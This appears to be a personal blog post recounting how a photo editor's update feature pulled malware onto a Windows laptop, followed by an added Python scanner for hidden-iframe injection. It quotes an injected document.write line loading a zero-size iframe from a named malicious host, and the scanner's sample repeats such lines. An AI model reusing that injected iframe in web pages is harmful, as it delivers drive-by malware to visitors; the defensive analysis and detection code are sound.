Two days ago I accidentally ran into a backdoor opened by a software update function. Malicious scripts and executables were downloaded to my laptop... I believe the problem is not only inside the software itself, but also related to Internet Explorer or a related Windows security mechanism.
I was trying a photo editing software named nEOiMAGING and suddenly it crashed, with some messages indicating a problem caused by "a.exe". It looked suspicious, didn't it? I had used that software a few times and it had never happened before. Where did the problem originate?
So I opened Process Explorer and found the file at C:\WINDOWS\system32\a.exe (about 14k). A file with such a "simple" name in a system directory almost always means a trojan, virus, or some other malware. I had to put down my normal work to take a careful look at it.
Process Explorer also showed that this file was started by cmd.exe, and the starting directory was exactly where I had nEOiMAGING installed. It did seem to be caused by this software. Then I did some tests. Normally I should not test them on my machine, as there might be a chance something could go wrong and mess up my system. But I did not have a virtual machine or sandbox to play with, and most of my files were backed up regularly. So I took a risky approach and ran the software again directly on my laptop. This time, I opened Process Monitor and logged every relevant event.
If I disabled my internet connection, the crash did not happen. But I was able to replicate the same crash when I was connected. Process Monitor showed me how a.exe sneaked into my system. It was copied from a file named "dod.exe" in the "Temporary Internet Files" folder. I also found some malicious scripts and executables in that directory and its subdirectories.
By then it became clear that the malware was downloaded via the connection opened by nEOiMAGING. I tried to look for an option to turn off the automatic update service in that software, but could not find one. I guessed it was hard-coded in. Had it been open-source software, I could have fixed it myself, or somebody else could have had it fixed long before. That's another reason I prefer to use free software (http://www.gnu.org/philosophy/free-sw.html) or open-source software, if I have a choice.
The final thing I tried to look at was why this did not happen before -- I had used the same software the day before and it had not caused any trouble then. The scripts found in my Temporary Internet Files folder indicated they came from some website, and they contained code like this
(WARNING: do NOT connect to the site below!)
document.write("<iframe src=http://xxx.hao1680.com/xx.htm?id=017 width=0 height=0></iframe>")
I guessed the update page requested by nEOiMAGING had somehow been compromised, and malicious code had been added via an iframe.
I did not have the time to figure out the details, but it appeared to me that this must be a backdoor or exploit in Windows, since such a script was able to download malware to my computer.
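As an added example (not from the original post), the following Python check scans saved HTML or script files, such as those left in the Temporary Internet Files folder, for the injection pattern shown above: an iframe that is sized to zero or hidden by style, whether written directly in the page or emitted through document.write. The sample page and the URLs in it are constructed.

```python
import os
import re
import sys

# An iframe tag and its attribute string (also matches inside document.write("...")
# once the JavaScript string escapes are undone below).
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^\s"'>]+)""", re.IGNORECASE)
# width=0, height="0" or width=0px, but not width=100 or width=0123
ZERO_DIM_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?0(?:px)?["']?(?![\w.])""", re.IGNORECASE)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


def find_hidden_iframes(text):
    """Return the src of every iframe that is zero-sized or hidden by style."""
    # Undo the escapes a JS string literal needs so that an iframe emitted by
    # document.write("...") is seen the same way as one written directly in HTML.
    text = text.replace('\\"', '"').replace("\\'", "'").replace("\\/", "/")
    hits = []
    for match in IFRAME_RE.finditer(text):
        attrs = match.group(1)
        if ZERO_DIM_RE.search(attrs) or HIDDEN_STYLE_RE.search(attrs):
            src = SRC_RE.search(attrs)
            hits.append(src.group(1) if src else "(no src)")
    return hits


def scan_directory(root, suffixes=(".htm", ".html", ".js")):
    """Walk a cache directory and map each file containing hidden iframes to their srcs."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    findings[path] = hits
    return findings


# Constructed sample: one benign visible iframe plus two injected hidden ones.
SAMPLE_PAGE = r'''<html><body>
<iframe src="http://updates.example/news.htm" width="600" height="400"></iframe>
<script>
document.write("<iframe src=http://injected.example/xx.htm?id=017 width=0 height=0></iframe>")
document.write("<iframe src=\"http://injected.example/two.htm\" style=\"display:none\"></iframe>")
</script></body></html>'''

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(scan_directory(target) if target else find_hidden_iframes(SAMPLE_PAGE))
```

Run it with a cache folder path as the only argument to scan that folder; without an argument it reports on the constructed sample.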
This is a little bit disturbing -- it seems that even if you do not use IE, the exploits are still able to bite you via other software that happens to use the internet connection somehow. One has no choice in this issue, unlike web browsing, where one could choose the somewhat more "secure" Firefox. The possible solutions are (1) stop using that software, or (2) use a firewall to block its access.